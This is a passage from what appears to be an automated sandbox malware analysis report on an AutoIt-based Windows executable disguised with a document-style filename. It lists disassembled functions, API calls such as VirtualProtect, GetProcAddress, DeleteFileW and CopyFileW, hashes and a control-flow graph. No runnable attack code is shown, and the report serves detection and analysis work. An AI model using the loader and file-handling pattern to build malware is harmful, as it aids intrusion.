                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: a1c88b665c4479a06d040a83f3f95b3b5bbd0ad09f9960f26a5213c72d3dbd34
                                                        • Instruction ID: 7b481bf5290f73bede3e39300d32469934b7fbca8cbe74a7d719fe0b34ce072f
                                                        • Opcode Fuzzy Hash: a1c88b665c4479a06d040a83f3f95b3b5bbd0ad09f9960f26a5213c72d3dbd34
                                                        • Instruction Fuzzy Hash: 63415C71600608EFDB15CF64C884B9A7BAAEF44352F5580ADEE099F205D7F9DD48CBA0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 0084B1CA
                                                        • GetProcAddress.KERNEL32(?,00844FF9), ref: 0084B1E8
                                                        • ExitProcess.KERNEL32(?,00844FF9), ref: 0084B1F9
                                                        • VirtualProtect.KERNEL32(00710000,00001000,00000004,?,00000000), ref: 0084B247
                                                        • VirtualProtect.KERNEL32(00710000,00001000), ref: 0084B25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                        • String ID:
                                                        • API String ID: 1996367037-0
                                                        • Opcode ID: ac2d34f570266a11e6bf9a573981f59b8a944524944841aae106cf33dc930e73
                                                        • Instruction ID: 2228dbe49c4b5d97218e85950e098f0f5a64384178270a0a72bf765e9e60da8e
                                                        • Opcode Fuzzy Hash: ac2d34f570266a11e6bf9a573981f59b8a944524944841aae106cf33dc930e73
                                                        • Instruction Fuzzy Hash: 4A513572A5475E5BD7218EB8CCD0665B7A4FB52325B280738C6F2C73C5F7A4D80A87A0
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(0071C848,0071C848), ref: 0072DDA2
                                                        • FindFirstFileW.KERNEL32(0071C848,?), ref: 00784A83
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesFindFirst
                                                        • String ID:
                                                        • API String ID: 4185537391-0
                                                        • Opcode ID: 2b2a5d6df434d2a9997602d5aa9a0d2840a982809118c2d3c091d37d27584d4f
                                                        • Instruction ID: 701fa7b8d981af46a5e352e1695771a1ef2074113db5fc7735c333a9f88062b1
                                                        • Opcode Fuzzy Hash: 2b2a5d6df434d2a9997602d5aa9a0d2840a982809118c2d3c091d37d27584d4f
                                                        • Instruction Fuzzy Hash: 28E0D832454815678234673CEC0E8E9775C9A05338B104706F975C20F0EBB89D4186DE
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0071E279
                                                        • timeGetTime.WINMM ref: 0071E51A
                                                        • TranslateMessage.USER32(?), ref: 0071E646
                                                        • DispatchMessageW.USER32(?), ref: 0071E651
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0071E664
                                                        • LockWindowUpdate.USER32(00000000), ref: 0071E697
                                                        • DestroyWindow.USER32 ref: 0071E6A3
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0071E6BD
                                                        • Sleep.KERNEL32(0000000A), ref: 00785B15
                                                        • TranslateMessage.USER32(?), ref: 007862AF
                                                        • DispatchMessageW.USER32(?), ref: 007862BD
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007862D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 2641332412-570651680
                                                        • Opcode ID: 67f235f4517e1da3ead89b29968f63014c7d4d150ea59b22d3875c1182d99dd2
                                                        • Instruction ID: a4e2acd14478dceaff2b9b524477e9bb7e667fd0c03bf646c76b0638ce8db5fc
                                                        • Opcode Fuzzy Hash: 67f235f4517e1da3ead89b29968f63014c7d4d150ea59b22d3875c1182d99dd2
                                                        • Instruction Fuzzy Hash: 9662AF70544340DBDB24EF68C899BAA77E5BF44304F14496AFD468B2D2DB7CD888CB62
                                                        APIs
                                                        • ___createFile.LIBCMT ref: 00746C73
                                                        • ___createFile.LIBCMT ref: 00746CB4
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00746CDD
                                                        • __dosmaperr.LIBCMT ref: 00746CE4
                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00746CF7
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00746D1A
                                                        • __dosmaperr.LIBCMT ref: 00746D23
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00746D2C
                                                        • __set_osfhnd.LIBCMT ref: 00746D5C
                                                        • __lseeki64_nolock.LIBCMT ref: 00746DC6
                                                        • __close_nolock.LIBCMT ref: 00746DEC
                                                        • __chsize_nolock.LIBCMT ref: 00746E1C
                                                        • __lseeki64_nolock.LIBCMT ref: 00746E2E
                                                        • __lseeki64_nolock.LIBCMT ref: 00746F26
                                                        • __lseeki64_nolock.LIBCMT ref: 00746F3B
                                                        • __close_nolock.LIBCMT ref: 00746F9B
                                                          • Part of subcall function 0073F84C: CloseHandle.KERNEL32(00000000,007BEEC4,00000000,?,00746DF1,007BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0073F89C
                                                          • Part of subcall function 0073F84C: GetLastError.KERNEL32(?,00746DF1,007BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0073F8A6
                                                          • Part of subcall function 0073F84C: __free_osfhnd.LIBCMT ref: 0073F8B3
                                                          • Part of subcall function 0073F84C: __dosmaperr.LIBCMT ref: 0073F8D5
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __lseeki64_nolock.LIBCMT ref: 00746FBD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007470F2
                                                        • ___createFile.LIBCMT ref: 00747111
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0074711E
                                                        • __dosmaperr.LIBCMT ref: 00747125
                                                        • __free_osfhnd.LIBCMT ref: 00747145
                                                        • __invoke_watson.LIBCMT ref: 00747173
                                                        • __wsopen_helper.LIBCMT ref: 0074718D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                        • String ID: 9As$@
                                                        • API String ID: 3896587723-2553832589
                                                        • Opcode ID: babd56570702135fa05225d0adff1ca6c73196e8fa1eed13af28d374e79acf83
                                                        • Instruction ID: c7f8917f0b50448399c38e37e324a55d19eb937607dee72f46c4ed36a623df83
                                                        • Opcode Fuzzy Hash: babd56570702135fa05225d0adff1ca6c73196e8fa1eed13af28d374e79acf83
                                                        • Instruction Fuzzy Hash: 50221671E042059BEF299F68DC95BFD7B61EF02324F248229E521AB2E2C73D8D50D752
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3074181302-0
                                                        • Opcode ID: ce40794c4a4879adc4034c1c97a9eca3a70192e61a6b37528df32c4b7d53c204
                                                        • Instruction ID: 45da50c4ea742afec993d232959403f8c5d947f405c3a44257d6787a305c3ef2
                                                        • Opcode Fuzzy Hash: ce40794c4a4879adc4034c1c97a9eca3a70192e61a6b37528df32c4b7d53c204
                                                        • Instruction Fuzzy Hash: E1325870E04245DFEB218F68C844BBDBBB1AF46350F28816AE9959F293C77C9C41C7A5

                                                        Control-flow Graph

                                                        APIs
                                                        • _wcscpy.LIBCMT ref: 0076026A
                                                        • _wcschr.LIBCMT ref: 00760278
                                                        • _wcscpy.LIBCMT ref: 0076028F
                                                        • _wcscat.LIBCMT ref: 0076029E
                                                        • _wcscat.LIBCMT ref: 007602BC
                                                        • _wcscpy.LIBCMT ref: 007602DD
                                                        • __wsplitpath.LIBCMT ref: 007603BA
                                                        • _wcscpy.LIBCMT ref: 007603DF
                                                        • _wcscpy.LIBCMT ref: 007603F1
                                                        • _wcscpy.LIBCMT ref: 00760406
                                                        • _wcscat.LIBCMT ref: 0076041B
                                                        • _wcscat.LIBCMT ref: 0076042D
                                                        • _wcscat.LIBCMT ref: 00760442
                                                          • Part of subcall function 0075C890: _wcscmp.LIBCMT ref: 0075C92A
                                                          • Part of subcall function 0075C890: __wsplitpath.LIBCMT ref: 0075C96F
                                                          • Part of subcall function 0075C890: _wcscpy.LIBCMT ref: 0075C982
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C995
                                                          • Part of subcall function 0075C890: __wsplitpath.LIBCMT ref: 0075C9BA
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C9D0
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C9E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 2955681530-2806939583
                                                        • Opcode ID: c7c1c5018eaa96c58865310e25ead7af6a4f70ca8474574f966fcf7cd671dab8
                                                        • Instruction ID: e558c7f6047f2c28a135e4ffe00149c4e3c803a3dafa5096c95850222be9032f
                                                        • Opcode Fuzzy Hash: c7c1c5018eaa96c58865310e25ead7af6a4f70ca8474574f966fcf7cd671dab8
                                                        • Instruction Fuzzy Hash: D2918F71504745EFDB20EF54C859F9BB3E8AF84310F04485DF9469B292EB38EA48CB92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0072EA39
                                                        • __wsplitpath.LIBCMT ref: 0072EA56
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcsncat.LIBCMT ref: 0072EA69
                                                        • __makepath.LIBCMT ref: 0072EA85
                                                          • Part of subcall function 00732BFF: __wmakepath_s.LIBCMT ref: 00732C13
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • _wcscpy.LIBCMT ref: 0072EABE
                                                          • Part of subcall function 0072EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0072EADA,?,?), ref: 0072EB27
                                                        • _wcscat.LIBCMT ref: 007832FC
                                                        • _wcscat.LIBCMT ref: 00783334
                                                        • _wcsncpy.LIBCMT ref: 00783370
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                        • String ID: '/u$Include$\$"}
                                                        • API String ID: 1213536620-3302818544
                                                        • Opcode ID: 5d3619d4134598dbd80db964f87edfc8b883ce6e4244ac9c7c4863ee6bba4032
                                                        • Instruction ID: 600756bfec79941fad4945e3ae77a038b3f1b1195105e6c19180f9ad6646bcdf
                                                        • Opcode Fuzzy Hash: 5d3619d4134598dbd80db964f87edfc8b883ce6e4244ac9c7c4863ee6bba4032
                                                        • Instruction Fuzzy Hash: 5F515EB1406340DBC315EF69EC85C96B7F8FB69300B80852FF54593262EB7C9646CB6A

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,00000000,00000001,00000000), ref: 0071428C
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00731BC7: __wcsicmp_l.LIBCMT ref: 00731C50
                                                        • _wcscpy.LIBCMT ref: 007143C0
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0078214E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\DOC092024-0431202229487.exe$CMDLINE$CMDLINERAW
                                                        • API String ID: 861526374-449234240
                                                        • Opcode ID: b30eb9444e892ab2e3fc50c21aecb0da27aa5c770f8c4384f362056ee724ef8d
                                                        • Instruction ID: 8b0eb99260802e2fc6cc77a8e642023b2b195e8b9a3b4ea02d59598b2dd488f0
                                                        • Opcode Fuzzy Hash: b30eb9444e892ab2e3fc50c21aecb0da27aa5c770f8c4384f362056ee724ef8d
                                                        • Instruction Fuzzy Hash: 4E8194B2800119EACB15EBE4DC5AEEFB778AF45350F500016F541B70C2EF686A85CBB1

                                                        Control-flow Graph

                                                        control_flow_graph 1204 75c890-75c940 call 740650 call 73010a call 714bce call 75c6a0 call 7141a7 call 732203 1217 75c946-75c94d call 75ce59 1204->1217 1218 75c9f3-75c9fa call 75ce59 1204->1218 1223 75c953-75c9f1 call 73297d call 731943 call 731914 call 73297d call 731914 * 2 1217->1223 1224 75c9fc-75c9fe 1217->1224 1218->1224 1225 75ca03 1218->1225 1228 75ca06-75cac2 call 71417d * 8 call 75d009 call 734129 1223->1228 1227 75cc53-75cc54 1224->1227 1225->1228 1231 75cc71-75cc7f call 714fd2 1227->1231 1263 75cac4-75cac6 1228->1263 1264 75cacb-75cae6 call 75c6e4 1228->1264 1263->1227 1267 75caec-75caf4 1264->1267 1268 75cb78-75cb84 call 734274 1264->1268 1269 75caf6-75cafa 1267->1269 1270 75cafc 1267->1270 1275 75cb86-75cb95 DeleteFileW 1268->1275 1276 75cb9a-75cb9e 1268->1276 1272 75cb01-75cb1f call 71417d 1269->1272 1270->1272 1280 75cb21-75cb27 1272->1280 1281 75cb49-75cb5f call 75c07d call 73373e 1272->1281 1275->1227 1277 75cba4-75cc1b call 75d10c call 75d134 call 75c251 1276->1277 1278 75cc2e-75cc42 CopyFileW 1276->1278 1284 75cc56-75cc6c DeleteFileW call 75cfc8 1277->1284 1300 75cc1d-75cc2c DeleteFileW 1277->1300 1283 75cc44-75cc51 DeleteFileW 1278->1283 1278->1284 1285 75cb29-75cb3c call 75c81a 1280->1285 1297 75cb64-75cb6f 1281->1297 1283->1227 1284->1231 1295 75cb3e-75cb47 1285->1295 1295->1281 1297->1267 1299 75cb75 1297->1299 1299->1268 1300->1227
                                                        APIs
                                                          • Part of subcall function 0075C6A0: __time64.LIBCMT ref: 0075C6AA
                                                          • Part of subcall function 007141A7: _fseek.LIBCMT ref: 007141BF
                                                        • __wsplitpath.LIBCMT ref: 0075C96F
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcscpy.LIBCMT ref: 0075C982
                                                        • _wcscat.LIBCMT ref: 0075C995
                                                        • __wsplitpath.LIBCMT ref: 0075C9BA
                                                        • _wcscat.LIBCMT ref: 0075C9D0
                                                        • _wcscat.LIBCMT ref: 0075C9E3
                                                          • Part of subcall function 0075C6E4: _memmove.LIBCMT ref: 0075C71D
                                                          • Part of subcall function 0075C6E4: _memmove.LIBCMT ref: 0075C72C
                                                        • _wcscmp.LIBCMT ref: 0075C92A
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF49
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF5C
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0075CB8D
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0075CC24
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0075CC3A
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0075CC4B
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0075CC5D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                        • String ID:
                                                        • API String ID: 152968663-0
                                                        • Opcode ID: 983fe5de8511483df0d27681157d7782e4abd0de02bf7219348056ec1e662ef1
                                                        • Instruction ID: 5fc7874fb0c3316f162dd3a0d2fa4bc93cac1ba6c0d425df6e8ebe2914746f9c
                                                        • Opcode Fuzzy Hash: 983fe5de8511483df0d27681157d7782e4abd0de02bf7219348056ec1e662ef1
                                                        • Instruction Fuzzy Hash: 16C13CB190021DAEDF11DFA5CC85FEEBBBDEF48310F0040AAB609E6151D7749A898F65

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007130B0
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007130BF
                                                        • LoadIconW.USER32(00000063), ref: 007130D5
                                                        • LoadIconW.USER32(000000A4), ref: 007130E7
                                                        • LoadIconW.USER32(000000A2), ref: 007130F9
                                                          • Part of subcall function 0071318A: LoadImageW.USER32(00710000,00000063,00000001,00000010,00000010,00000000), ref: 007131AE
                                                        • RegisterClassExW.USER32(?), ref: 00713167
                                                          • Part of subcall function 00712F58: GetSysColorBrush.USER32(0000000F), ref: 00712F8B
                                                          • Part of subcall function 00712F58: RegisterClassExW.USER32(00000030), ref: 00712FB5
                                                          • Part of subcall function 00712F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712FC6
                                                          • Part of subcall function 00712F58: LoadIconW.USER32(000000A9), ref: 00713009
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 2880975755-4155596026
                                                        • Opcode ID: b6a4451f235c2e35feb224b38527ea8fe7f9414661b1c4f220e85a013ba50f02
                                                        • Instruction ID: 02efe7e87766b15204163c81cbe524164b3b099098d11a0cf4568f3ad9706d22
                                                        • Opcode Fuzzy Hash: b6a4451f235c2e35feb224b38527ea8fe7f9414661b1c4f220e85a013ba50f02
                                                        • Instruction Fuzzy Hash: 19213370E01308BBDB10DFA9ED49B99BFF5EB48310F50812BE614A22A1D77945818FA9

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00712F8B
                                                        • RegisterClassExW.USER32(00000030), ref: 00712FB5
                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712FC6
                                                        • LoadIconW.USER32(000000A9), ref: 00713009
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
